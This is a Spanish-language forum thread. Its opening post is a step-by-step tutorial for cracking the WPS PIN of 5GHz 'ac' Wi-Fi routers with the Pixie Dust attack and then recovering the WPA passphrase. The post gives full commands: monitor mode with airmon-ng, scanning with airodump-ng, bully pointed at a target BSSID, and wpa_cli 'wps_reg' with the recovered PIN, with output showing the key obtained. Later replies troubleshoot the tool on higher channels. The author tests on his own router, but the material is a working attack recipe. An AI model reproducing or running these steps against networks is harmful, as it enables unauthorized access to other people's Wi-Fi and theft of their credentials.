Manual crack WPS con ataque pixiedust banda 5Ghz (estándar a y ac)

kcdtv · 17-06-2016 15:46:11

Manual crack WPS en banda 5Ghz (estándar a y ac) con un solo PIN (método pixiedust)

Se lee por muchos lados que no hay forma de utilizar las técnicas modernas de crack WPA (explotando la "brecha" llamada WPS y su modo PIN) contra la ultima generación de puntos de acceso.
Me refiero a los routers compatibles con el estándar ac cuya tasa de transmisión puede alcanzar hasta 2167Mbps ("ac3100" y "ac3150")
Incluso no son pocos los temas en el foro aircrack-ng o Kali Linux dónde se afirma que no hay forma de inyectar trafico en la banda 5Ghz.
No es cierto y lo voy a demostrar enseguida realizando en vivo un ataque pixie dust contra un punta de acceso "ac1200": El Alfa Network AC1200R.
Generaré el PIN por defecto con tan solo un solo intento y obtendré la llave WPA del punto de acceso
Si no te ha quedado claro las lineas anteriores un poco de lectura :
Sobre el ataque pixie dust : "Pixie Dust" ataque de fuerza bruta offline para generar el PIN valido
Sobre el estándar ac : Bien entender el estándar "ac" para no caer en la trampa

Lo que necesitamos

- Un adaptador wifi con chipset Ralink RT3750 o RT3572
Desgraciadamente son a mi conocimiento los únicos chipset con compatibilidad mode monitor y inyección en banda 5Ghz. Yo usaré un RT3572; es el chipset que lleva la Alfa AWUS052NH
- Un routeur ac con chipset realtek o ralink
Estos modelos de chipset estan soportados por pixiewps lo que significa que obtendremos el PIN en un instante
- Bully modificado por aanarchyy
El ataque pixedust se ha de hacer con bully porque reaver funciona muy mal con los chipsets USB ralink. Para descargar y instalar la mod de aanrchyy ver Bully WPS: La alternativa a Reaver renace con soporte Pixiewps

¡Acción!

El crack se hace en dos etapas.

Hacer el ataque pixie dust con bully para obtener el PIN
Mandar el PIN obtenido con wpa_cli para obtener la llave WPA

Debemos hacerlo así porque el chispet rt30572 no anda muy bien con el WPS en modo monitor.
Con reaver ni vale la pena probar
Con bully basta para obtener el M3 y poder hacer un ataque pixie dust pero no se logra llegar hasta el M8 para obtener la llave WPA.
Por lo tanto se ha de usar wpa_cli (comando interactivo para wpa_supplicant) para mandar el PIN y obtener la llave

Etapa uno : ataque pixie dust

Enchufamos el Wifi USB con chipset RT3570 o RT3572 en el puerto USB (será muy probablemente la interfaz wlan1 ) y lo ponemos en mode monitor.
Para no tener conflictos con network manager a la hora de mandar el PIN con wpa_cli debemos "matar" a los procesos potencialmente conflictivos.
Por lo tanto hacemos

sudo airmon-ng check kill

Seguido de

sudo airmon-ng start wlan1

Obtenemos una interfaz wlan1mon en modo monitor que usamos para escanear la banda 5Ghz (con airodump-ng)

sudo airodump-ng --wps -b a --manufacturer wlan1mon

Es importante usar las opciones --wps (para ver si el wps esta activado) y -b a (para escanear solo la banda "a" )
Cuando vemos nuestro punto de acceso aramos el escaneo con [CTRL+C] y copiamos su BSSID

Este es el alfa AC1200R con su eSSID por defecto para la red "ac": 11n AP 5G

Podemos lanzar el ataque pixiedust con Bully modificado por AAnarchyy

sudo bully -5 -b 00:C0:CA:85:32:E2 -d -v 4 wlan1mon

-5 : para usar la banda 5Ghz, la que usa el estándar ac
-b <mac_router> : argumento mandatario, ponemos la dirección mac del objetivo
-d : opción para efectuar un ataque pixie dust automaticamente
-v 4 : nivel de salida máximo (verbose); para ver todos los detales en consola
wlan1mon : segundo argumento mandatario, la interfaz que debe ser en modo monitor

Enseguida se obtienen las cadenas para hacer un pixie dust cool

El PIN por defecto se obtiene en una fracción de segundos...
(Obviamente se necesita tener pixiewps del amigo wiire instalado, la herramienta oficial para hacer ataques pixiedust.)

Bully va a intentar luego obtener la llave WPA mandando el PIN.
Pero no logrará, así que no vale la pena esperar y parramos el proceso con [CTRL+C]
Pasamos a la segunda fase

Etapa dos: Obtener la contraseña WPA con el PIN y wpa_cli

Para ello solo tenemos que inspirarnos con el buenísimo tutorial de Coeman76 : [ Tutorial ] Conexión WPS desde Linux (Debian,Slax,etc..)

Lo primero es desactivar el mode monitor que no necesitamos.

sudo airmon-ng stop wlan1mon

Y volvemos a tener a nuestra interfaz tipo wlanX en modo managed

Por si a caso se despierta "network manager" lo volvemos "a matar"

sudo airmon-ng check kill

Ahora creamos un archivo de texto para recoger la llave WPA.
Lanzamos nuestro editor de texto favorito (gedit en mi caso) con derechos de administrador

sudo gedit

Copiamos y pegamos estas lineas

ctrl_interface=/var/run/wpa_supplicant
ctrl_interface_group=root
update_config=1

Y guardamos el fichero en el directorio /etc llamándolo wpa_supplicant.conf

Ahora lanzamos el demonio de wpa_suplicant de tal forma que vaya rellenando nuestro fichero de configuración en vivo, así:

sudo wpa_supplicant -i wlan1 -c /etc/wpa_supplicant.conf -B

Lanzamos el comando interactivo de wpa_supplicant (se llama wpa_cli) indicando nuestra interfaz

sudo wpa_cli -i wlan1

Volvemos atrás en nuestra consola para copiar el bSSID y el PIN y pegar los en la siguiente linea de ordenes

wps_reg 00:C0:CA:85:32:E2 40899336

Le damos a [ENTER] y observamos lo que sucede en consola :

Todo va muy rápido, un segundo o dos.
Podéis ver en la parte colorida de verde el mensaje de éxito con el bendito :

<3>WPA: Key negotiation completed with 00:c0:ca:85:32:e2 [PTK=CCMP GTK=CCMP]
<3>CTRL-EVENT-CONNECTED - Connection to 00:c0:ca:85:32:e2 completed [id=1 id_str=]

significa que hemos mandado el PIN y que el router no has devuelto la llave WPA

El prompt de wpa_cli vuelve a aparecer y si entramos el comando

status

Vemos los detalles del Punto de Acceso con el cuál hemos llevado a cabo nuestra transacción WPS :

Paso 3 : Conectarse con la llave WPA

Paramos wpa_cli tecleando

quit

Y volvemos a activar Network Manager con

sudo restart network-manager

Ahora recogemos la llave WPA que se ha guardado en el fichero /etc/wpa_supplicant.conf que hemos creado anteriormente

cat /etc/wpa_suplicant.conf

¡Ojo!
La contraseña esta entre comillas (") y no forman parte de la contraseña wink
O sea, obtengo

psk="wifilibre43ver"

Y debo copiar unicamente wifilibre43ver.
Esta es la contraseña...

Comprobando la validez del proceso ....

¡Estoy conectado a mi Punto de Acceso ac1200 con su tasa de 867Mbps! cool
Así se lleva un crack WPS contundente contra un router "ac"... Mission is possible! smile

cardi1977 · 16-08-2016 22:43:09

para quitarse el sombrero,yo los fines de semanas suelo ir ha mi pueblo y ahi unas pocas 5g voy ha intentarlo.jajajajajajaj

kcdtv · 16-08-2016 22:56:39

Me doy cuenta que en el tema hablo solo de los chispet USB Ralink pero se debería poder hacer (y solo con reaver) con algunos chipsets internos Intel y Broadcom que tienen soporte ac y soporte mode monitor & inyección.
¡Saludos! smile

carlitomorao · 04-09-2017 19:26:46

Hola a todos,bueno despues de llevar un tiempo por aqui y leer infinidad de post,me detuve a probar este nuevo tipo de ataque sobre mi propia red,la verdad que despues de revisar una y otra vez...no encuentro donde esta el problema,expongo mi caso,realizo todos los pasos descritos por kcdtv pero llego al punto en el que lanzo bully y se me queda trabado a la escucha en la banda de 5ghz hasta llegar al canal 58 en el cual se detiene y no avanzo nada mas,aclaro que actualmente uso un adaptador Alfa AWUS052NG el cual trae en su interior el famoso Ralink RT3572,adjunto captura de consola por si alguien sabe solventar el fallo o darme un poco de luz en el asunto,gracias.
Imagen : texte

kcdtv · 05-09-2017 11:13:12

Buenos días
¿Has deshabilitado Network Manager?
Bully no consigue fijar la interfaz en el canal correcto y puede ser por culpa de procesos conflictivos.
Podría ser un asunto de versiones-drivers-kernel.
¿Tu sistema está bien al día?

carlitomorao · 05-09-2017 11:50:47

kcdtv escribió:

Buenos días
¿Has deshabilitado Network Manager?
Bully no consigue fijar la interfaz en el canal correcto y puede ser por culpa de procesos conflictivos.
Podría ser un asunto de versiones-drivers-kernel.
¿Tu sistema está bien al día?

Hola de nuevo,previamente deshabilito Network Manager mediante (airmon-ng check kill),en que distribucion se realizaron las pruebas del tutorial?decir que mis pruebas realizadas fueron en kali-linux.

root@kali:~# cat /etc/*-release
DISTRIB_ID=Kali
DISTRIB_RELEASE=kali-rolling
DISTRIB_CODENAME=kali-rolling
DISTRIB_DESCRIPTION="Kali GNU/Linux Rolling"
PRETTY_NAME="Kali GNU/Linux Rolling"
NAME="Kali GNU/Linux"
ID=kali
VERSION="2017.1"
VERSION_ID="2017.1"
ID_LIKE=debian
ANSI_COLOR="1;31"
HOME_URL="http://www.kali.org/"
SUPPORT_URL="http://forums.kali.org/"
BUG_REPORT_URL="http://bugs.kali.org/"
root@kali:~#

Ultima edición por carlitomorao (05-09-2017 12:15:11)

kcdtv · 05-09-2017 12:35:59

Pon aquí el final de dmesg para ahorrar preguntas. smile

sudo dmesg

Usa la opción insertar código y no pongas todo, solo el final, para ver el falló.
Para ver la versión es más completo con

uname -a

carlitomorao · 05-09-2017 12:55:45

kcdtv escribió:

Pon aquí el final de dmesg para ahorrar preguntas.
sudo dmesg
Usa la opción insertar código y no pongas todo, solo el final, para ver el falló.
Para ver la versión es más completo con
uname -a

Ahi va a ver si te sirve.

kcdtv · 05-09-2017 16:02:54

OK.
No se ve ningún problema "mecánico" y se ve que el problema viene de bully
Bueno, accabo de probar y hay un problema con el bully tal y como está en Kali ahora:

[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY(aanarchyy@gmail.com)
[X] Unknown frequency '-1113135872' reported by interface 'wlan1mon'
[!] Using '4c:bb:58: for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from '18:44:e6' on channel 'unknown'
[+] Switching interface 'wlan1mon' to channel '36'
[!] ioctl(SIOCSIWFREQ) on 'wlan1mon' failed with '-1'
[X] Unable to set channel on 'wlan1mon', exiting

El valor aquí "Unknown frequency '-1113135872' " es problemático big_smile
He usado también mi rt3572
No sé porque hay esta cadena "111313". si no estaría se tendría la frecuencia correcta: 5,872 Ghz
Al final reventa al llegar al canal 54...

[+] Switching interface 'wlan0mon' to channel '36'
[+] Switching interface 'wlan0mon' to channel '40'
[+] Switching interface 'wlan0mon' to channel '44'
[+] Switching interface 'wlan0mon' to channel '48'
[+] Switching interface 'wlan0mon' to channel '52'
[+] Switching interface 'wlan0mon' to channel '56'
[+] Switching interface 'wlan0mon' to channel '58'
[!] ioctl(SIOCSIWFREQ) on 'wlan0mon' failed with '-1'
[X] Unable to set channel on 'wlan0mon', exiting

No pasa del 58...
Prueba con tu router configurado en el canal 40, será más simple

carlitomorao · 05-09-2017 19:15:42

Hola de nuevo,segui tu consejo y probe a bajar de frecuencia del canal 100 que estaba mi red al canal 40,ahora los resultados son distintos,ni siquiera sale el primer canal en 5ghz a la escucha,asi lleva ya alrededor de 20 minutos y no se mueve de ahi.

root@kali:~# sudo bully -5 -b xx:xx:xx:xx:xx:xx -d -v 4 wlan0mon
[!] Bully v1.1 - WPS vulnerability assessment utility
[P] Modified for pixiewps by AAnarchYY(aanarchyy@gmail.com)
[X] Unknown frequency '-1230650368' reported by interface 'wlan0mon'
[!] Using '00:c0:ca:95:7a:1f' for the source MAC address
[+] Datalink type set to '127', radiotap headers present
[+] Scanning for beacon from 'xx:xx:xx:xx:xx:xx' on channel 'unknown'

kcdtv · 06-09-2017 12:59:51

Bueno... He probado un poco más y te propongo esta solución:

Instalas la ultima revisión de bully:

git clone https://github.com/aanarchyy/bully

cd bully/src/

make

sudo make install

Configuras tu router en le canal 36 (supongo que 40 está bien)
Antes de lanzar el ataque con bully fijas bien el canal y el objetivo con un scan con airodump-ng en una consola
```
sudo airodump-ng --bssid <mac_objetivo> --channel <numero_canal>
```
En otra consola lanzas bully

Así va muy rápido para hacer un pixiedust en frecuencias 5Ghz:

carlitomorao · 06-09-2017 14:16:48

Bien ahora si,realizadas las pruebas en el canal 36 parece que todo funciona correctamente,al aumentar de canal al 40 de nuevo continua el error,no ahi manera de llegar con el ataque mas alla de dicho canal por el momento a mi entender,creo que se debe a algun fallo en la compilacion del codigo de bully,seguiremos esperando novedades,gracias por tus aclaraciones y comprension,un saludo.

Ultima edición por carlitomorao (06-09-2017 14:20:52)

Jjulio · 30-09-2017 18:17:22

Felicidades por el buen trabajo y por los temas tan interesantes.
A mi tambien me pasa lo mismo que no avanza del canal 58.
He hecho todo lo que comenta al usuario carlitomorao pero no hay forma de que avance.
Si lo pongo en el canal 36 si que funciona pero a partir de ahi no.
Si existe alguna version o modificacion de algo que funcione, me gustaria que lo reportara.
Muchas gracias y buen trabajo.

joking · 01-10-2017 11:22:18

A mi pasa lo mismo, no puedo inyectar tráfico a partir del canal 58 con WifiSlax 1.1 64 bits, sabe alguien si con otra versión funciona.

kcdtv · 02-10-2017 14:51:56

Seamos precisos para no prestar a confusión. smile
Estamos hablando de bully, no de inyección "en general".
Todos los chipsets ralink de doble banda que usan el driver rt2800usb son capaces de inyectar en todos los canales de la banda 5Ghz.
Es un bug propio a Bully (y que tiene pinta de ser algo tipo "buffer overflow" al momento de manejar los "radiotap headers")
La cosa es que haría falta retocar el código fuente de bully. Bueno, es lo que deduzco.
Puedes eventualemnte probar con un viejo SO del 2013-2014 con librerias de la epoca (sin actualizar) para ver si funciona con las liberias de la época.
A falta de arreglar el fallo y de poder usar bully en un SO moderno, es el único "plan B para Bully" que se me ocurre.
saludos

joking · 02-10-2017 18:06:57

Ok, gracias kcdtv, bueno para ser más preciso me pasa tanto con bully como con reaver.
También hecho el aireplay-ng mon0 -9 para probar el test de inyección de la última mac probada, pues bien en las que saca el pin válido si que inyecta perfectamente (hasta el 58), pero en las que no, tampoco inyecta, ya sea con bully o reaver.
"buffer overflow" y "radiotap headers" de momento son palabras mayores para mi, pero bueno poco a poco iré aprendiendo.
Ah, también he probado con los dos chip el rt2800usb y el que lleva incorporado mi portátil de intel y hace lo mismo, por lo que supongo que será algún fallo de las librerias de la programación de la radio en 5ghz. Actualizé los drivers y tampoco se resolvió el problema.
Probaré con otras versiones a ver, si saco algo en claro ya lo publico.

Ultima edición por joking (02-10-2017 18:09:05)

carlitomorao · 02-10-2017 19:04:09

Hola de nuevo,personalmente por motivos de hardware no he podido hacer mas pruebas en la banda de 5Ghz,tan solo dispongo de un adaptador con el rt3572 con lo que reaver nada de na en dicha banda y bully llegue hasta donde deje mi ultimo post en el hilo,tambien por falta de tiempo,a la espera de alguna novedad en bully y poder darle vidilla al hilo nuevamente,un saludo.

kcdtv · 04-10-2017 13:04:18

Gracias por aportar estas precisiones porque me doy cuenta que el parche paras los realtek (injection fails on certains AP in 5Ghz) no basta para arreglar el fallo de los ralink. tongue
Hay efectivamente un asunto general de compatibilidad 5Ghz detrás del crash de bully con el rt3572 (y también con rt3570 : mismo driver)
Inyecta en los canales que fallan pero no procesa las respuestas,
0% de tasa de inyección cuando se ven claramente mis clientes fakes asociados (si están asociados es que han obtenido una respuesta probe). pam

Fuck! tongue big_smile
Bueno... Mirando las cosas del lado positivo: Estudiar (y resolver) este bug nos va a permitir mejorar reaver con los Ralink
Y será aún más simple hacer un ataque pixiedust en banda 5Ghz
Ya comentaré algo cuando se haya analizado capturas con varios ojos. Hasta la próxima...

carlitomorao · 04-10-2017 19:12:50

Gracias a ti por tu rapida respuesta y dedicación,a la espera de novedades para probar nuevamente....un saludo para todos/as lectores.

joking · 06-10-2017 10:52:03

Hola, buenas a todos, el caso que yo voy sacando algo en claro, resulta que el canal de vez en cuando se cambia de forma automática en el router y cuado esta por el canal 58 o más abajo si se le puede atacar, pero el problema está en todas las versiones de wifislax.
Lo que voy ha decir a continuación es una hipótesis, por lo que entiendo de programación creo que a la hora de auditar las canales de radio se ha utilizado una variable "entero simple" que va de 0 hasta 65535, entonces cuando la frecuencia es mayor de 65000khz se pasa a negativo por lo que da error.
La solución es utilizar en el código fuente de reaver y bully una variable "entero largo" que va hasta 2147483647.
Repido es una teoría pero no se si será esto, lo digo por si alguien con conocimientos avanzados en programación le puede echar un vistazo al código fuente.

kcdtv · 06-10-2017 14:55:42

Lo que voy ha decir a continuación es una hipótesis, por lo que entiendo de programación creo que a la hora de auditar las canales de radio se ha utilizado una variable "entero simple" que va de 0 hasta 65535, entonces cuando la frecuencia es mayor de 65000khz se pasa a negativo por lo que da error.

¡Ole!
Me parece muy pertinente. smile
Esta noche hablaremos de estos temas con rofl0r y le hablaré de tu hipótesis. Muchas Gracias,

joking · 09-10-2017 11:38:36

Bueno, supongo que no sería ese el problema, habrá que seguir investigando porque a partir del canal 58 deja de funcionar.

kcdtv · 06-02-2018 20:21:15

Mejor tarde que nunca... big_smile
Ataque pixiedust con Ralink RT3572 y reaver 1.6.4 en canales superiores al 58.

La razón de nuestras desgracias es... la configuración de los parámetros regionales (iw reg)
He escrito un tema para explicar el asunto: Elucidando el misterio "Inyección imposible en ciertos canales 5Ghz"
edit: Con reaver hay que emplear el argumento -N cuando uséis los Ralink, sino tendréis fallos muchas veces.

Ultima edición por kcdtv (07-02-2018 12:03:15)

Tema	Respuestas	Vistas	Ultimo mensaje
WPA2: roto con KRACK. ¿Ahora que? por Virkon [ 1 2 ]	26	7673	15-03-2023 16:57:32 por kcdtv
Pegado: Pegado:: AWITAS. Ataque a WPS con rogueAP potegido con WPA por javierbu [ 1 2 ]	34	3752	12-03-2023 18:24:22 por Guybrush92
Pegado: Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r [ 1 2 3 … 18 ]	436	63507	07-03-2023 12:35:27 por kcdtv
iwd;¿El demonio WiFi Linux qué lo cambiara todo? por kcdtv	0	405	23-02-2023 17:09:39 por kcdtv
Pegado: Pegado:: Base de datos WPSPIN (original) open source actualizada por kcdtv [ 1 2 3 4 5 ]	114	258448	19-02-2023 17:36:14 por chuchof

Foro Wifi-libre.com

Anuncio

#1 17-06-2016 15:46:11